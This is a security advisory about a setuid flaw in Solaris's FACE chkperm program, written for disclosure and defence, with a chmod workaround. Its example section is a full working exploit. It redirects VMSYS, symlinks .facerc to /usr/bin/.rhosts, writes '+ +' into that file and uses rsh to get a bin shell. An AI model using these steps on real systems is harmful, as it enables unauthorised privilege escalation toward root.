Solaris 2.x Vulnerability [/usr/vmsys/bin/chkperm] Problem: Vulnerabilities in /usr/vmsys/bin/chkperm Platform: Solaris 2.4, 2.5, 2.5.1, other System V derived systems with the FACE package installed Impact: Local users can overwrite bin owned files with zero length files. Local users can create world writable bin owned files. Account bin can be compromised. Solution: Remove the suid/sgid bit from the program until a patch is available ------------------------------------------------------------------------ PROBLEM DESCRIPTION Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package called FACE (Framed Access Command Environment) installed. Included in the package is a program called chkperm which checks a file to see if the user has permission to use the FACE interface. This program is installed suid and sgid bin, and is trivially exploitable to compromise the bin account. And in Solaris, which installs many/most of the system binaries as bin, it may be said that "binliness is next to rootliness." The FACE package comes from System V, and may be available under other SYSV based systems. We welcome reports of other vulnerable systems. This vulnerability is believed to be known to the intruder community. ------------------------------------------------------------------------ PLATFORMS AFFECTED Solaris 2.x, possibly other SYSVR4 derived systems. We welcome reports of other vulnerable systems. ------------------------------------------------------------------------ IMPACT Local user can gain system privileges as bin (root follows shortly) ------------------------------------------------------------------------ SUGGESTED WORKAROUND % chmod ug-s /usr/vmsys/bin/chkperm ------------------------------------------------------------------------ EXAMPLE % mkdir /tmp/foo % mkdir /tmp/foo/lib % chmod -R 777 /tmp/foo % setenv VMSYS /tmp/foo % umask 0000 % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc % /usr/vmsys/bin/chkperm -l -u foo % ls -l /usr/bin/.rhosts -rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts % echo "+ +" >> /usr/bin/.rhosts % ls -l /usr/bin/.rhosts -rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts % rsh -l bin localhost /bin/csh -i Warning: no access to tty; thus no job control in this shell... % id uid=2(bin) gid=2(bin) ------------------------------------------------------------------------ DISCUSSION The program (which resides at /usr/vmsys/bin/chkperm) does several things in an insecure fashion: 1) It tries to open the file $VMSYS/.facerc and if the file is not present it creates it, with zero length, ownership bin.bin 2) The user's UMASK is inherited, so permissions on the newly-created .facerc are under the control of an attacker. 3) VMSYS by default is set to /usr/lib, but the program cheerfully checks your environment for a different VMSYS base directory, and uses that. 4) There is no check made for symbolic links, avoiding the need to race. This exploit is far from original, though it appears to be unpublished as yet. Blindly following symlinks, following without checking for existence or matching ownership, inheriting the user's environment, are examples of very naive programming wholly inappropriate for a program installed setuid to a system account. Sun's practice of shipping their system binaries and binaries directories owned and writable by bin certainly contributes to making this exposure more effective and dangerous. Kevin Prigge John Ladwig